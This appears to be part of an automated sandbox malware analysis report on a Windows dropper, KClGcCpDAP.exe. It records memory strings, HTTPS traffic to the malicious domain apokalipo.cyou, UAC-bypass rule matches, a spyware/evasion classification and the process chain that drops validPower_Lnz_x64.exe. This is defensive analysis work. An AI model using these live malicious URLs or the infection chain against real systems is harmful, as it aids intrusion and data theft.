                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.symauth.com/rpa00
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.virtualbox.org/ovf/machine
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.vmware.com/0/
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/interfaces/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/interfaces/specifications/vmdk.html#compressedhttp://www.vmware.com/specificat
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/schema/ovf/1/envelope
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/specifications/vmdk.html#compressed
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/specifications/vmdk.html#sparse
                  Source: Virtual.exe, 00000002.00000000.1705508860.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000002.00000002.1725292654.00007FF6C5877000.00000002.00000001.01000000.00000008.sdmp, Virtual.exe, 00000003.00000002.1780908036.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp, Virtual.exe, 00000003.00000000.1720716762.00007FF718577000.00000002.00000001.01000000.0000000E.sdmp | String found in binary or memory: http://www.vmware.com/specifications/vmdk.html#sparsehttp://www.vmware.com/interfaces/specifications
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2210919646.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou/
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2220545140.000000000044B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou/2t2
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2219569359.00000000004DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou/N
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D76000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLL
                  Source: validPower_Lnz_x64.exe, 0000000A.00000002.2222475898.0000000002D1F000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou/watchvideo-sheila-avis-de-recherche-191280-2770205.htmleldbZzsLLytC%2FMtKEkDE
                  Source: validPower_Lnz_x64.exe, 0000000A.00000003.2202888428.0000000000482000.00000004.00000020.00020000.00000000.sdmp, validPower_Lnz_x64.exe, 0000000A.00000003.2202511556.0000000000485000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apokalipo.cyou:443/watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=Z
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/cps0%
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://d.symcb.com/rpa0
                  Source: KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: https://gnu.org/licenses/
                  Source: KClGcCpDAP.exe, 00000001.00000002.1728064931.000000006E253000.00000002.00000001.01000000.00000007.sdmp | String found in binary or memory: https://gnu.org/licenses/gpl.html
                  Source: Virtual.exe, 00000002.00000002.1722899571.0000000003D53000.00000004.00000020.00020000.00000000.sdmp, Virtual.exe, 00000003.00000002.1778571972.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2022025745.0000000005121000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.digicert.com/CPS0
                  Source: unknown | Network traffic detected: HTTP traffic on port 49973 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49973
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknown | Network traffic detected: HTTP traffic on port 49979 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49979
                  Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49973 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49979 version: TLS 1.2

                  System Summary

                  Source: 20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.cmd.exe.33907f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 12.2.cmd.exe.3364a08.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.validPower_Lnz_x64.exe.2604a20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.validPower_Lnz_x64.exe.26726ed.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 20.2.validPower_Lnz_x64.exe.262ca20.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.validPower_Lnz_x64.exe.2649aed.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile deleted: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 008B0726 appears 34 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 00871F13 appears 54 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 00873821 appears 500 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 008B0237 appears 685 times
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: String function: 008B32F3 appears 83 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 6E250E68 appears 39 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 6E232BC0 appears 79 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D40237 appears 685 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D40726 appears 34 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D01F13 appears 54 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D432F3 appears 83 times
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: String function: 00D03821 appears 500 times
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: String function: 665AF96C appears 38 times
                  Source: validPower_Lnz_x64.exe.4.drStatic PE information: Resource name: ZIP type: Zip archive data (empty)
                  Source: jamulieilmfjkk.4.drStatic PE information: Number of sections : 12 > 10
                  Source: bewwwy.18.drStatic PE information: Number of sections : 12 > 10
                  Source: Ammonium.dll.1.drStatic PE information: Number of sections : 11 > 10
                  Source: KClGcCpDAP.exe, 00000000.00000000.1694797876.00000000008DD000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: \LegalCopyrightCopyright (c) Friarbird. All rights reserved.H OriginalFilenamekwashiorkor.exe@ vs KClGcCpDAP.exe
                  Source: KClGcCpDAP.exe, 00000001.00000000.1698535734.0000000000D6D000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: \LegalCopyrightCopyright (c) Friarbird. All rights reserved.H OriginalFilenamekwashiorkor.exe@ vs KClGcCpDAP.exe
                  Source: KClGcCpDAP.exe, 00000001.00000002.1728141493.000000006E26A000.00000008.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamelibgpg-error.dll" vs KClGcCpDAP.exe
                  Source: KClGcCpDAP.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                  Source: 20.2.validPower_Lnz_x64.exe.2671aed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.cmd.exe.33907f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.validPower_Lnz_x64.exe.264a6ed.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.cmd.exe.3364a08.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.validPower_Lnz_x64.exe.2604a20.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.validPower_Lnz_x64.exe.26726ed.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 20.2.validPower_Lnz_x64.exe.262ca20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.validPower_Lnz_x64.exe.2649aed.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: classification engineClassification label: mal96.spyw.expl.evad.winEXE@22/25@1/1
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008AFE21 FormatMessageW,GetLastError,LocalFree,0_2_008AFE21
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008745EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,0_2_008745EE
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCode function: 1_2_00D045EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,1_2_00D045EE
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeCode function: 2_2_66663DA4 _errno,_invalid_parameter_noinfo,GetDiskFreeSpaceA,GetLastError,_errno,2_2_66663DA4
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_008B304F GetModuleHandleA,GetLastError,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoCreateInstance,ExitProcess,0_2_008B304F
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCode function: 0_2_00896B88 ChangeServiceConfigW,GetLastError,0_2_00896B88
                  Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exeFile created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64
                  Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: cabinet.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: msi.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: version.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: wininet.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: comres.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: clbcatq.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: msasn1.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: crypt32.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: feclient.dll0_2_00871070
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeCommand line argument: cabinet.dll0_2_00871070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: cabinet.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: msi.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: version.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: wininet.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: comres.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: clbcatq.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: msasn1.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: crypt32.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: feclient.dll1_2_00D01070
                  Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exeCommand line argument: cabinet.dll1_2_00D01070
                  Source: KClGcCpDAP.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: KClGcCpDAP.exeVirustotal: Detection: 8%
                  Source: KClGcCpDAP.exeReversingLabs: Detection: 23%
                  Source: KClGcCpDAP.exeString found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls
                  Source: C:\Users\user\Desktop\KClGcCpDAP.exeFile read: C:\Users\user\Desktop\KClGcCpDAP.exe
                  Source: unknownProcess created: C:\Users\user\Desktop\KClGcCpDAP.exe "C:\Users\user\Desktop\KClGcCpDAP.exe"
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Process created: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe "C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Process created: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe "C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Process created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe "C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe"
Source: C:\Users\user\AppData\Roaming\TlsCloud_WRv3_x64\Virtual.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: msi.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: msxml3.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: feclient.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\KClGcCpDAP.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: cryptbase.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: msi.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: version.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: cabinet.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: msxml3.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: windows.storage.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: wldp.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: profapi.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: feclient.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: iertutil.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: uxtheme.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: textinputframework.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: coremessaging.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: ntmarta.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: wintypes.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: wintypes.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: wintypes.dll
Source: C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe Section loaded: powrprof.dll
